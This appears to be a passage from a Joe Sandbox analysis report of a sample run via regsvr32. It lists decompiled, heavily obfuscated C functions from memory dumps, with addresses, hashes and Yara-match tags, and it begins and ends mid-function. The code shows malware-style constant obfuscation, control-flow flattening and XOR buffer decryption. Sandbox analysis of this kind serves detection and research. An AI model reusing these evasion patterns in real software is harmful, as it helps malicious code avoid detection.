								} while ((_t199 & _t193 << _t52) == 0);
								L18:
								if(_t121 == _t150) {
									_t188 = _v28;
									if(_t188 == _t150) {
										_t122 = 0;
										goto L25;
									}
									_t122 = 0x20;
									if((_t188 & 0x80000000) != 0) {
										goto L25;
									} else {
										goto L22;
									}
									do {
										L22:
										_t122 = _t122 + 0xffff;
										_t206 = 1;
										_t58 = _t122 - 1; // -65504
									} while ((_t188 & _t206 << _t58) == 0);
									goto L25;
								}
								goto L19;
								L17:
								_t121 = 0;
								goto L18;
							}
						} else {
							_v28 =  *_t202 / _t154;
							if(((_t202[1] ^ _a8) & 0x80000000) != 0) {
								E100177DF( &_v28, E10017A43( &_v28,  &_v76));
							}
							_t117 = _a4;
							 *_t117 = _v28;
							_t117[1] = _v24;
							_t158 = _v20;
							L41:
							_t117[2] = _t158;
							return _t117;
						}
					}
					_t149 = _a4;
					 *_t149 = 0;
					 *((intOrPtr*)(_t149 + 4)) = 0x80000000;
					 *((intOrPtr*)(_t149 + 8)) = 1;
					return _t149;
				}
				_t117 = _a4;
				 *_t117 =  *__ecx;
				_t117[1] = __ecx[1];
				_t158 = __ecx[2];
				goto L41;
			}

0x10017c6a
0x10017c72
0x10017c74
0x10017c76
0x10017c7c
0x10017c98
0x10017c9b
0x10017c9e
0x10017ca1
0x10017ca4
0x10017cc3
0x10017cd5
0x10017cd5
0x10017ce6
0x10017ce8
0x10017ceb
0x10017d31
0x10017d38
0x10017d3b
0x10017d3e
0x10017d41
0x10017d44
0x10017d47
0x10017d4a
0x10017d4d
0x10017d57
0x10017e85
0x10017e90
0x10017ea2
0x10017ea2
0x10017ea7
0x10017ead
0x10017eb2
0x10017eb5
0x00000000
0x10017eb5
0x10017d5d
0x10017d62
0x10017d62
0x10017d67
0x00000000
0x00000000
0x10017d71
0x10017d72
0x10017d8e
0x10017d8e
0x10017dba
0x10017dbc
0x10017dbd
0x10017dc2
0x10017dda
0x10017de2
0x10017de4
0x10017df3
0x10017df6
0x10017e0e
0x10017e0e
0x10017e13
0x10017e2f
0x10017e43
0x10017e68
0x10017e7b
0x10017d60
0x00000000
0x10017d60
0x10017e81
0x00000000
0x10017e84
0x10017e15
0x10017e18
0x10017e1b
0x10017e21
0x10017e29
0x10017e2a
0x10017e2a
0x00000000
0x10017e18
0x10017df8
0x10017dfb
0x10017dfb
0x10017e03
0x10017e06
0x10017e08
0x10017e08
0x10017e0b
0x00000000
0x10017e0b
0x10017dc4
0x10017dc7
0x10017dca
0x10017dd2
0x10017dd4
0x10017dd4
0x10017dd7
0x00000000
0x00000000
0x00000000
0x00000000
0x10017d74
0x10017d74
0x10017d74
0x10017d7b
0x10017d7c
0x10017d81
0x10017d89
0x10017d8c
0x10017d93
0x10017d98
0x10017db8
0x00000000
0x10017db8
0x10017da2
0x10017da3
0x00000000
0x00000000
0x00000000
0x00000000
0x10017da5
0x10017da5
0x10017da5
0x10017dac
0x10017dad
0x10017db2
0x00000000
0x10017db6
0x00000000
0x10017d87
0x10017d87
0x00000000
0x10017d87
0x10017ced
0x10017cf3
0x10017d01
0x10017d13
0x10017d13
0x10017d18
0x10017d1e
0x10017d23
0x10017d26
0x10017eb8
0x10017eb8
0x00000000
0x10017eb8
0x10017ceb
0x10017ca6
0x10017cb0
0x10017cb2
0x10017cb5
0x00000000
0x10017cb5
0x10017c7e
0x10017c83
0x10017c88
0x10017c8b
0x00000000

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f89539d33ef98471ae8ab9525687261cf812d11b65f072bcf719933248921f2d
Instruction ID: 09018d7a4d7ce1c66e9186b445c34f2834f17cebc33d34c60813dbefd3fed9bd
Opcode Fuzzy Hash: f89539d33ef98471ae8ab9525687261cf812d11b65f072bcf719933248921f2d
Instruction Fuzzy Hash: 2681FC75D0020A9BDB18DF99D4959EEBBF5FF48340F51812EE509AB280DB30AE85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 003E0887 Relevance: .1, Instructions: 120
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E003E0887(void* __ecx, void* __edx, char _a4, signed int _a8) {
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t73;
				signed int _t76;
				signed int _t94;
				signed int _t95;
				signed int _t99;
				signed int _t104;
				unsigned int _t105;
				unsigned int _t106;
				unsigned int* _t112;
				signed int _t115;
				signed int _t116;
				signed int* _t117;
				unsigned int _t119;
				void* _t125;
				signed int* _t128;
				unsigned int _t132;

				_t117 = _a8;
				_push(_t117);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t73);
				_v16 = 0x3a9e6;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t76 =  *_t117;
				_t128 =  &_a4;
				_a8 = 0x33b8b1;
				_t115 = _t117[1] ^ _t76;
				_v24 = _t76;
				_v20 = _t115;
				_a8 = _a8 * 0x4d;
				_a8 = _a8 + 0xa7dd;
				_a8 = _a8 << 0xa;
				_a8 = _a8 ^ 0x3cd46801;
				_v32 = 0x88e0ce;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 + 0xf3a5;
				_v32 = _v32 ^ 0x000104c5;
				_t119 = _a8 + _t115;
				if((_v32 - 0x00000001 & _a8 + _t115) != 0) {
					_t119 = (_t119 &  !(_v32 - 1)) + _v32;
					_t132 = _t119;
				}
				_v28 = 0xdc99f3;
				_v28 = _v28 + 0xffffa6ee;
				_v28 = _v28 ^ 0x00d098df;
				_v32 = 0x4f9591;
				_t99 = 0x34;
				_push(_t99);
				_v32 = _v32 / _t99;
				_v32 = _v32 + 0xffff0696;
				_v32 = _v32 ^ 0x000892ee;
				_a8 = 0xdacbb8;
				_a8 = _a8 + 0x949d;
				_push(_t99);
				_a8 = _a8 * 0x3c;
				_a8 = _a8 << 0xb;
				_a8 = _a8 ^ 0x54976e10;
				_t94 = E003C8D52(_t99, _t119, _t132);
				_v28 = _t94;
				if(_t94 != 0) {
					_a8 = _a8 & 0x00000000;
					_t112 = _t94;
					_t125 =  >  ? 0 :  &(_t128[_t119 >> 2]) - _t128 + 3 >> 2;
					if(_t125 != 0) {
						_t116 = _a8;
						_t95 = _v24;
						do {
							_t104 =  *_t128;
							_t128 =  &_a4;
							_t105 = _t104 ^ _t95;
							 *_t112 = _t105;
							_t112 =  &(_t112[1]);
							_t106 = _t105 >> 0x10;
							 *((char*)(_t112 - 3)) = _t105 >> 8;
							 *(_t112 - 2) = _t106;
							_t116 = _t116 + 1;
							 *((char*)(_t112 - 1)) = _t106 >> 8;
						} while (_t116 < _t125);
						_t115 = _v20;
						_t94 = _v28;
					}
					 *((char*)(_t94 + _t115)) = 0;
				}
				return _t94;
			}

0x003e088d
0x003e0892
0x003e0893
0x003e0897
0x003e0898
0x003e0899
0x003e089e
0x003e08af
0x003e08b3
0x003e08b4
0x003e08b5
0x003e08ba
0x003e08bd
0x003e08c5
0x003e08c7
0x003e08d0
0x003e08d4
0x003e08d8
0x003e08e0
0x003e08e5
0x003e08ed
0x003e08f5
0x003e08fa
0x003e0902
0x003e0919
0x003e091d
0x003e0928
0x003e0928
0x003e0928
0x003e092c
0x003e0936
0x003e093e
0x003e0946
0x003e0954
0x003e0957
0x003e0958
0x003e095e
0x003e0966
0x003e096e
0x003e0976
0x003e0983
0x003e0984
0x003e0988
0x003e098d
0x003e09a6
0x003e09a8
0x003e09b0
0x003e09b2
0x003e09bc
0x003e09d3
0x003e09d8
0x003e09da
0x003e09de
0x003e09e2
0x003e09e2
0x003e09e5
0x003e09e8
0x003e09ea
0x003e09f1
0x003e09f4
0x003e09f7
0x003e09fa
0x003e0a00
0x003e0a01
0x003e0a04
0x003e0a08
0x003e0a0c
0x003e0a0c
0x003e0a10
0x003e0a10
0x003e0a1d

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02611bb0585ec58979b93d6a4a8ba5c6b6ac2bcf199a4113ae10162ba8de395c
Instruction ID: f4ecca37784d167564fd41842ff9bd85cf7b1140092bbc1c5d6a0f9155039c2d
Opcode Fuzzy Hash: 02611bb0585ec58979b93d6a4a8ba5c6b6ac2bcf199a4113ae10162ba8de395c
Instruction Fuzzy Hash: 624164B2509382ABD354CF28C48551BFBE0FFD4364F454A2DF88297261C7B4E949CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 003DE2E1 Relevance: .1, Instructions: 117
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E003DE2E1(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v296;
				char _t110;
				signed int _t113;
				void* _t115;
				char* _t128;
				void* _t135;
				intOrPtr* _t137;

				_t137 = __ecx;
				_v36 = 0xf79f1;
				_v32 = 0x328cf;
				_v28 = 0;
				_t128 =  &_v296;
				_v24 = 0;
				while(1) {
					_t110 =  *_t137;
					if(_t110 == 0) {
						break;
					}
					if(_t110 == 0x2e) {
						 *_t128 = 0;
					} else {
						 *_t128 = _t110;
						_t128 = _t128 + 1;
						_t137 = _t137 + 1;
						continue;
					}
					L6:
					_v20 = 0x47c94e;
					_v20 = _v20 ^ 0x92adb3fa;
					_v20 = _v20 ^ 0x92e16ad3;
					_v12 = 0x349b1b;
					_v12 = _v12 | 0x1f92d278;
					_v12 = _v12 + 0x2899;
					_v12 = _v12 + 0xffff5ce1;
					_v12 = _v12 ^ 0x1fbe9f86;
					_v16 = 0xa156b;
					_v16 = _v16 << 0x10;
					_v16 = _v16 << 0xe;
					_v16 = _v16 >> 9;
					_v16 = _v16 ^ 0x0062d10e;
					_v8 = 0xddb77f;
					_v8 = _v8 << 7;
					_v8 = _v8 + 0x5c60;
					_v8 = _v8 ^ 0x6ed7f73e;
					_t135 = E003D84B5(_v20,  &_v296, _v12, _v16, _v8);
					if(_t135 != 0) {
						L8:
						_v8 = 0x129b2a;
						_v8 = _v8 * 0x50;
						_v8 = _v8 << 6;
						_v8 = _v8 ^ 0x741f4801;
						_v12 = 0xd40937;
						_v12 = _v12 ^ 0xae1e1cd7;
						_v12 = _v12 ^ 0xaec26f45;
						_v20 = 0x9e5975;
						_v20 = _v20 << 0xa;
						_v20 = _v20 ^ 0x796649a1;
						_t113 = E003C4FCC(_v8 + _t137, _v20);
						_v8 = 0x7cb6ba;
						_v8 = _v8 + 0x42d8;
						_v8 = _v8 ^ 0x6676ae04;
						_v8 = _v8 ^ 0x660936ff;
						_v16 = 0xc95502;
						_v16 = _v16 ^ 0x3847dbff;
						_v16 = _v16 + 0xdc3c;
						_v16 = _v16 ^ 0x3d434894;
						_v16 = _v16 ^ 0x05cae63d;
						_v12 = 0xa7695a;
						_v12 = _v12 + 0xffff8a10;
						_v12 = _v12 + 0x7684;
						_push(_t135);
						_v12 = _v12 * 0x7a;
						_v12 = _v12 ^ 0x4fc4aa1b;
						_push(_v12);
						_push(_t113 ^ 0x2485bb72);
						_t115 = E003DF9C4(_v8, _v16);
					} else {
						_v8 = 0xcaf3ad;
						_v8 = _v8 | 0x0fc372c1;
						_v8 = _v8 + 0xffffbc8c;
						_v8 = _v8 ^ 0x0fccc726;
						_v12 = 0x83f1a;
						_v12 = _v12 + 0xffff6822;
						_v12 = _v12 ^ 0x00050d70;
						_v20 = 0x79bfad;
						_v20 = _v20 * 0x2a;
						_v20 = _v20 ^ 0x13f21c41;
						_t115 = E003CF6A5(_v8, _v12,  &_v296, _v20);
						_t135 = _t115;
						if(_t135 != 0) {
							goto L8;
						}
					}
					return _t115;
				}
				goto L6;
			}

0x003de2eb
0x003de2ed
0x003de2f6
0x003de2fe
0x003de301
0x003de307
0x003de314
0x003de314
0x003de318
0x00000000
0x00000000
0x003de30e
0x003de31c
0x003de310
0x003de310
0x003de312
0x003de313
0x00000000
0x003de313
0x003de31e
0x003de31e
0x003de32b
0x003de332
0x003de339
0x003de340
0x003de347
0x003de34e
0x003de355
0x003de35c
0x003de363
0x003de367
0x003de36b
0x003de36f
0x003de376
0x003de37d
0x003de381
0x003de388
0x003de3a0
0x003de3a7
0x003de410
0x003de410
0x003de41b
0x003de41e
0x003de422
0x003de429
0x003de430
0x003de437
0x003de43e
0x003de445
0x003de449
0x003de45b
0x003de460
0x003de469
0x003de476
0x003de47d
0x003de484
0x003de48b
0x003de492
0x003de499
0x003de4a0
0x003de4a7
0x003de4ae
0x003de4b5
0x003de4c0
0x003de4c1
0x003de4c4
0x003de4cb
0x003de4d1
0x003de4d5
0x003de3a9
0x003de3a9
0x003de3b0
0x003de3b7
0x003de3be
0x003de3c5
0x003de3cc
0x003de3d3
0x003de3da
0x003de3e5
0x003de3ee
0x003de3ff
0x003de404
0x003de40a
0x00000000
0x00000000
0x003de40a
0x003de4e2
0x003de4e2
0x00000000

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 086d6e43c0f1a963300f70fcd006cb56401220bb848500076e907a62f9cbf325
Instruction ID: 0aeaa04260b51176be42855a961515017ea4c3314ee36b51b983c65a23b7e572
Opcode Fuzzy Hash: 086d6e43c0f1a963300f70fcd006cb56401220bb848500076e907a62f9cbf325
Instruction Fuzzy Hash: 355100B5C00219EBCF49DFA5DA4A5DEBFB1BF54308F20859AD022BA250D7B40B58DF80

Uniqueness

Uniqueness Score: -1.00%

Function 003D815D Relevance: .1, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E003D815D(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v520;
				char _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				void* _t87;
				void* _t89;
				void* _t102;
				signed int _t103;
				signed int _t107;
				void* _t119;

				_t102 = __ecx;
				_push(_a4);
				_t119 = __ecx;
				_push(__edx);
				_push(__ecx);
				E003C2528(_t87);
				_v556 = 0x2abb6;
				_t89 = 0x23484;
				do {
					while(_t89 != 0x23484) {
						if(_t89 == 0x7f8d7) {
							_v568 = 0x84998;
							_v568 = _v568 * 0x51;
							_v568 = _v568 | 0x71e6de1c;
							_v568 = _v568 + 0xffff48d9;
							_v568 = _v568 ^ 0x73fc2c97;
							_v564 = 0x8b25ea;
							_v564 = _v564 << 0xa;
							_v564 = _v564 + 0xffffab1c;
							_v564 = _v564 ^ 0x2c971609;
							_v556 = 0xaee6e2;
							_v556 = _v556 + 0xffffbffa;
							_v556 = _v556 ^ 0x00a5e681;
							_v560 = 0x3c0c80;
							_v560 = _v560 << 0x10;
							_v560 = _v560 ^ 0x20dcf096;
							_v560 = _v560 | 0xa4c2e691;
							_v560 = _v560 ^ 0xacddf71b;
							return E003CD79B( &_v552, _v568, _v564, _v556,  &_v520, _t102, _t119, _v560);
						}
						if(_t89 != 0xead57) {
							goto L6;
						}
						_v564 = 0x3a9912;
						_v564 = _v564 + 0xffff42d0;
						_v564 = _v564 ^ 0x0037edb2;
						_v568 = 0xc595a3;
						_v568 = _v568 ^ 0x6b861bba;
						_t107 = 0x7d;
						_v568 = _v568 / _t107;
						_v568 = _v568 ^ 0x00d01f46;
						E003C8E1E( &_v520, _v564, _t107, _v568);
						_pop(_t102);
						_t89 = 0x7f8d7;
					}
					_v564 = 0x47c5bd;
					_t103 = 0x3f;
					_v564 = _v564 / _t103;
					_v564 = _v564 + 0xd877;
					_v564 = _v564 ^ 0x0001fc0c;
					_v560 = 0x88aefa;
					_v560 = _v560 << 0xd;
					_v560 = _v560 >> 6;
					_v560 = _v560 ^ 0x0056c5db;
					_v568 = 0x882a33;
					_v568 = _v568 * 0xe;
					_v568 = _v568 | 0x06476bc4;
					_v568 = _v568 ^ 0x077c4c5c;
					E003D2AEF(_v564, _v560,  &_v552, _v568);
					_pop(_t102);
					_t89 = 0xead57;
					L6:
				} while (_t89 != 0x5dbac);
				return _t89;
			}

0x003d815d
0x003d8167
0x003d816e
0x003d8170
0x003d8171
0x003d8172
0x003d817c
0x003d8187
0x003d8193
0x003d8193
0x003d8199
0x003d828a
0x003d8297
0x003d829f
0x003d82a7
0x003d82af
0x003d82b7
0x003d82bf
0x003d82c4
0x003d82cc
0x003d82d4
0x003d82dc
0x003d82e4
0x003d82ec
0x003d82f4
0x003d82f9
0x003d8301
0x003d8309
0x00000000
0x003d832d
0x003d81a1
0x00000000
0x00000000
0x003d81a7
0x003d81b1
0x003d81b9
0x003d81c1
0x003d81c9
0x003d81d7
0x003d81da
0x003d81de
0x003d81f3
0x003d81f9
0x003d81fa
0x003d81fa
0x003d81fe
0x003d820e
0x003d8211
0x003d8215
0x003d821d
0x003d8225
0x003d822d
0x003d8232
0x003d8237
0x003d823f
0x003d824c
0x003d8254
0x003d825c
0x003d8271
0x003d8277
0x003d8278
0x003d827a
0x003d827a
0x00000000

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f59da9f1135efbf8aababcd239f8667e1758644c44964967682843c9071685ad
Instruction ID: d92ce1e358a42962f4d8872ae84245eaeebdc98ea3deae21d6ac047065f21d5e
Opcode Fuzzy Hash: f59da9f1135efbf8aababcd239f8667e1758644c44964967682843c9071685ad
Instruction Fuzzy Hash: 584134725083828BC359DF20E88985BBBE5FBD4354F100E1EF19586261D7B4DA5ECB93

Uniqueness

Uniqueness Score: -1.00%

Function 003C2E8C Relevance: .1, Instructions: 80
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E003C2E8C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				void* _t71;
				void* _t74;
				void* _t76;
				void* _t86;

				_t76 = __ecx;
				_t78 = _a4;
				_push(0x104);
				_push(_a8);
				_v20 = 0x104;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(0x104);
				_v16 = 0x49777;
				_v16 = 0x799fb4;
				_t86 = 0;
				_v16 = _v16 ^ 0xaec3db49;
				_v16 = _v16 ^ 0xaeba54fd;
				_v12 = 0xc05c05;
				_v12 = _v12 ^ 0x6960b96f;
				_v12 = _v12 ^ 0x69a9cc90;
				_v8 = 0xce7d69;
				_v8 = _v8 + 0xffff9a5b;
				_v8 = _v8 * 0x77;
				_v8 = _v8 | 0x5ec51fee;
				_v8 = _v8 ^ 0x5fceb2ce;
				_t71 = E003C88B3(_a4, _v16);
				_t85 = _t71;
				if(_t71 != 0) {
					_v12 = 0xeedb6a;
					_v12 = _v12 + 0x38da;
					_v12 = _v12 >> 5;
					_v12 = _v12 ^ 0x00087f3f;
					_v16 = 0x4aa92d;
					_v16 = _v16 >> 4;
					_v16 = _v16 ^ 0x00040780;
					_v8 = 0x9bc6be;
					_v8 = _v8 >> 4;
					_v8 = _v8 >> 0xb;
					_v8 = _v8 ^ 0x000c854a;
					_t74 = E003D8545(_v12, _v16,  &_v20, _t85, _t76, _t78, _v8);
					_v16 = 0x32fff4;
					_v16 = _v16 | 0xb1981f20;
					_t86 = _t74;
					_v16 = _v16 ^ 0xb1bff6fa;
					_v8 = 0x4a6115;
					_v8 = _v8 ^ 0xa47d6e3b;
					_v8 = _v8 ^ 0x5cd34b50;
					_v8 = _v8 + 0x2519;
					_v8 = _v8 ^ 0xf8ef4887;
					E003D4FB8(_t85, _v16, _v8);
				}
				return _t86;
			}

0x003c2e9a
0x003c2e9c
0x003c2e9f
0x003c2ea0
0x003c2ea3
0x003c2ea6
0x003c2ea7
0x003c2ea8
0x003c2ea9
0x003c2eae
0x003c2eb8
0x003c2ebf
0x003c2ec1
0x003c2ec8
0x003c2ecf
0x003c2ed6
0x003c2edd
0x003c2ee4
0x003c2eeb
0x003c2ef6
0x003c2ef9
0x003c2f00
0x003c2f10
0x003c2f15
0x003c2f1c
0x003c2f22
0x003c2f2c
0x003c2f33
0x003c2f37
0x003c2f3e
0x003c2f45
0x003c2f49
0x003c2f50
0x003c2f57
0x003c2f5b
0x003c2f5f
0x003c2f73
0x003c2f78
0x003c2f81
0x003c2f88
0x003c2f8a
0x003c2f91
0x003c2f98
0x003c2f9f
0x003c2fa6
0x003c2fad
0x003c2fba
0x003c2fbf
0x003c2fca

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: abcde0e027904a80f4bf3d19ccd4fc01d79984930f7be0dea9fe01c2d278433e
Instruction ID: 80da27f2f7a1803e106bc270dad9dc6a73b3c6799630cb9893536139506fb345
Opcode Fuzzy Hash: abcde0e027904a80f4bf3d19ccd4fc01d79984930f7be0dea9fe01c2d278433e
Instruction Fuzzy Hash: 4A31FFB2D01208FBCF09DFA5D94A99EFBB4EB50708F20C1A8E511A7224D7B45B44DF40

Uniqueness

Uniqueness Score: -1.00%

Function 003C2050 Relevance: .1, Instructions: 71
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E003C2050(intOrPtr* __ecx, void* __edx, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t73;
				intOrPtr _t79;
				signed int _t81;
				intOrPtr* _t89;
				signed int _t90;

				_t90 = _a4;
				_push(_a12);
				_t89 = __ecx;
				_push(_a8);
				_push(_t90);
				_push(__ecx);
				E003C2528(_t73);
				_a4 = 0xf139f;
				_v16 = 0xc1d5cc;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x0030ab03;
				_v8 = 0x12be2e;
				_v8 = _v8 + 0xffff7aa4;
				_v8 = _v8 ^ 0x7ad76d40;
				_v8 = _v8 ^ 0x7ac726d4;
				_a4 = 0xbdee2b;
				_t81 = 0x5a;
				_a4 = _a4 / _t81;
				_a4 = _a4 + 0xffff3b5a;
				_a4 = _a4 ^ 0x000aa080;
				_v12 = 0xaa02f8;
				_v12 = _v12 << 2;
				_v12 = _v12 ^ 0x02a13684;
				E003C2DB8( *((intOrPtr*)(__ecx + 4)), _v16, _v8, _a4, _v12, _t90);
				_v12 = 0x2d84a6;
				_v12 = _v12 + 0x2218;
				_v12 = _v12 ^ 0x00279f59;
				_v16 = 0xf3d629;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x0f399434;
				_v8 = 0xd4a75c;
				_v8 = _v8 + 0xf7f4;
				_v8 = _v8 + 0xffff2606;
				_v8 = _v8 ^ 0x00d3a709;
				_a4 = 0x2cd63b;
				_a4 = _a4 << 2;
				_a4 = _a4 >> 0xc;
				_a4 = _a4 << 0xb;
				_a4 = _a4 ^ 0x0054a45a;
				E003DF4FB(_v12,  *__ecx, _v16,  *((intOrPtr*)(_t90 + 0x2c)), _v8,  *((intOrPtr*)(__ecx + 4)), _a4);
				_t79 =  *((intOrPtr*)(_t89 + 4));
				 *((intOrPtr*)(_t90 + 0x2c)) =  *((intOrPtr*)(_t90 + 0x2c)) + _t79;
				return _t79;
			}

0x003c2057
0x003c205b
0x003c205e
0x003c2060
0x003c2063
0x003c2065
0x003c2066
0x003c206b
0x003c2074
0x003c207b
0x003c207f
0x003c2086
0x003c208d
0x003c2094
0x003c209b
0x003c20a2
0x003c20ae
0x003c20b2
0x003c20b5
0x003c20bc
0x003c20c3
0x003c20ca
0x003c20ce
0x003c20e4
0x003c20e9
0x003c20f0
0x003c20f7
0x003c20fe
0x003c2105
0x003c2109
0x003c2110
0x003c2117
0x003c211e
0x003c2125
0x003c212c
0x003c2133
0x003c2137
0x003c213b
0x003c213f
0x003c215a
0x003c215f
0x003c2165
0x003c216d

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c3c96f3e185231008657b96042d989a7c78502c9a3a57f89ed886c334ddd166
Instruction ID: 40f8bcb217031eeeb2b719e91e82109426d175af91a5d8523e2bca6d5253b78c
Opcode Fuzzy Hash: 1c3c96f3e185231008657b96042d989a7c78502c9a3a57f89ed886c334ddd166
Instruction Fuzzy Hash: E031E176901208FBCF45DFA5C94A8CEBFB1FF04358F20C199E9196A250C3B09A99DF80

Uniqueness

Uniqueness Score: -1.00%

Function 003C9B4C Relevance: .0, Instructions: 47
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E003C9B4C(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _t57;
				intOrPtr _t59;

				_v20 = 0x44038;
				_v12 = 0x8d2b04;
				_v12 = _v12 ^ 0x02905185;
				_v12 = _v12 + 0xffffc8aa;
				_v12 = _v12 | 0x2c832e3b;
				_v12 = _v12 ^ 0x2e95ab1d;
				_v16 = 0x2d0f9f;
				_v16 = _v16 ^ 0xfab811d8;
				_v16 = _v16 ^ 0xfa9ad96a;
				_v8 = 0x7925c4;
				_v8 = _v8 | 0xf64dbd3c;
				_v8 = _v8 ^ 0xa85a2e5b;
				_v8 = _v8 + 0xc03d;
				_v8 = _v8 ^ 0x5e27f44a;
				_t59 =  *0x3e221c; // 0x0
				E003D8E42( *((intOrPtr*)(_t59 + 0x64)), _v12, _v16, _v8);
				_v20 = 0xc31866;
				_v20 = _v20 >> 6;
				_v20 = _v20 ^ 0x000c6a7f;
				_v12 = 0x40d80f;
				_v12 = _v12 ^ 0x57fc216e;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x79f70626;
				_v8 = 0x1017d3;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x000b1516;
				_v16 = 0xe3b86b;
				_v16 = _v16 + 0xffff2728;
				_t49 =  &_v16;
				_v16 = _v16 ^ 0x00e26cf4;
